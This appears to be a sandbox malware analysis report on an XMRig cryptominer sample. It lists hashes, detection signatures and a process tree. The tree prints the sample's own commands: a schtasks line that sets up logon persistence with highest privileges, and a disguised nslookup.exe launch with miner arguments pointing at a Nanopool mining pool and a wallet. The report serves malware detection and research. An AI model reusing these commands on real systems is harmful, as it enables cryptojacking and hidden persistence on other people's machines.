Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 13:05
Static task
static1
Behavioral task
behavioral1
Sample
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe
Resource
win7-20240903-en
General
-
Target
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe
-
Size
2.1MB
-
MD5
ef9e6a4bab77a1e5ed51669eabeba31d
-
SHA1
43b67b32d2fd462f0cb9277ed974d63a5575fc8c
-
SHA256
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
-
SHA512
8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99
-
SSDEEP
24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 17 IoCs
Processes:
resource yara_rule behavioral1/memory/1264-38-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-40-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-46-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-52-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-56-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-55-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-50-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-48-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-44-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-42-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-37-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-63-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-64-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-62-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-61-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-60-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1264-67-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
IOAshdohSha.exesihost64.exepid process 2588 IOAshdohSha.exe 1968 sihost64.exe -
Loads dropped DLL 4 IoCs
Processes:
cmd.execonhost.exepid process 2112 cmd.exe 2112 cmd.exe 2208 conhost.exe 2208 conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2208 set thread context of 1264 2208 conhost.exe nslookup.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
conhost.execonhost.exepid process 2064 conhost.exe 2208 conhost.exe 2208 conhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
conhost.execonhost.exenslookup.exedescription pid process Token: SeDebugPrivilege 2064 conhost.exe Token: SeDebugPrivilege 2208 conhost.exe Token: SeLockMemoryPrivilege 1264 nslookup.exe Token: SeLockMemoryPrivilege 1264 nslookup.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.execonhost.execmd.execmd.exeIOAshdohSha.execonhost.exesihost64.exedescription pid process target process PID 2892 wrote to memory of 2064 2892 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe conhost.exe PID 2892 wrote to memory of 2064 2892 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe conhost.exe PID 2892 wrote to memory of 2064 2892 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe conhost.exe PID 2892 wrote to memory of 2064 2892 ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe conhost.exe PID 2064 wrote to memory of 2996 2064 conhost.exe cmd.exe PID 2064 wrote to memory of 2996 2064 conhost.exe cmd.exe PID 2064 wrote to memory of 2996 2064 conhost.exe cmd.exe PID 2996 wrote to memory of 2832 2996 cmd.exe schtasks.exe PID 2996 wrote to memory of 2832 2996 cmd.exe schtasks.exe PID 2996 wrote to memory of 2832 2996 cmd.exe schtasks.exe PID 2064 wrote to memory of 2112 2064 conhost.exe cmd.exe PID 2064 wrote to memory of 2112 2064 conhost.exe cmd.exe PID 2064 wrote to memory of 2112 2064 conhost.exe cmd.exe PID 2112 wrote to memory of 2588 2112 cmd.exe IOAshdohSha.exe PID 2112 wrote to memory of 2588 2112 cmd.exe IOAshdohSha.exe PID 2112 wrote to memory of 2588 2112 cmd.exe IOAshdohSha.exe PID 2588 wrote to memory of 2208 2588 IOAshdohSha.exe conhost.exe PID 2588 wrote to memory of 2208 2588 IOAshdohSha.exe conhost.exe PID 2588 wrote to memory of 2208 2588 IOAshdohSha.exe conhost.exe PID 2588 wrote to memory of 2208 2588 IOAshdohSha.exe conhost.exe PID 2208 wrote to memory of 1968 2208 conhost.exe sihost64.exe PID 2208 wrote to memory of 1968 2208 conhost.exe sihost64.exe PID 2208 wrote to memory of 1968 2208 conhost.exe sihost64.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 2208 wrote to memory of 1264 2208 conhost.exe nslookup.exe PID 1968 wrote to memory of 1208 1968 sihost64.exe conhost.exe PID 1968 wrote to memory of 1208 1968 sihost64.exe conhost.exe PID 1968 wrote to memory of 1208 1968 sihost64.exe conhost.exe PID 1968 wrote to memory of 1208 1968 sihost64.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\IOAshdohSha.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\IOAshdohSha.exeC:\Users\Admin\IOAshdohSha.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\IOAshdohSha.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:1208
-
-
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=1006⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD56a7e9885a2d01df564b46f8f27258853
SHA12f57231a188226669ff74cf886a09572ed69025e
SHA2566ba3e42c8fa7dabe994e2793f369bac914ea2e4949174fc2a0efe4cbfebe8171
SHA51284b4b84066a48df6bd087679a75333c306c8f688679c508e171b14d5012711de3a781cea4d4c65debb694557dafd66dbc359516451f700179d5c6806710cdf17
-
Filesize
2.1MB
MD5ef9e6a4bab77a1e5ed51669eabeba31d
SHA143b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
SHA5128d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99